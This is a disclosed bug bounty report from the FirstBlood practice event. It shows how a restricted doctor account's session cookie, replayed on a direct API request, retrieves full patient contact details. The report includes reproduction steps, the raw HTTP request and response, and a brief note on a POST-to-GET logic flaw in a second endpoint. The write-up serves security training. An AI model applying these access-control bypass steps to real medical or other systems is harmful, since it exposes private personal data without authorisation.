FirstBlood-#124 — IDOR - Restricted doctor can view all the details of the patient such as contact details etc.
This report has been reviewed and accepted as a valid vulnerability on FirstBlood!
On 2021-05-10, ibruteforce reported:
Using the credentials as shown in https://www.bugbountyhunter.com/hackevents/report?id=123, it was understood that it was a restricted doctors account where full details aren't visible.
However, you could send a direct request to
GET /drpanel/drapi/query.php?aptid=56911493 using the restricted accounts cookie to view the full account information.
Login with the credentials obtained using the methods shown in report #123.
On a new incognito tab, login with the drAdmin credentials given by bbhunter.
Once logged in, keep a note of your cookie which starts with
drps. It should look something like
Now on the incognito tab, on the dashboard, click on the appointment details and intercept the proxy.
- Now, make the same request with the restricted users cookie,
drps=25bbddaccaa27a8bc23b6c212 in this case.
GET /drpanel/drapi/query.php?aptid=56911493 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Date: Mon, 10 May 2021 14:51:23 GMT
Content-Type: text/html; charset=UTF-8
For safeguarding reasons please do not leave this alert on your screen when unattended! Use information below to verify patients over the phone.
Name: nanictica nacntiaa
Address: asdf d
As you can see, this proves that the restricted user can view the details of the user.
This report has been publicly disclosed for everyone to view
FirstBlood ID: 12
Vulnerability Type: Auth issues
If the request method is changed from POST to GET, then the endpoint /drapi/qp.php becomes available to ANY user due to an application logic error
Respect Earnt: 1500000
is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.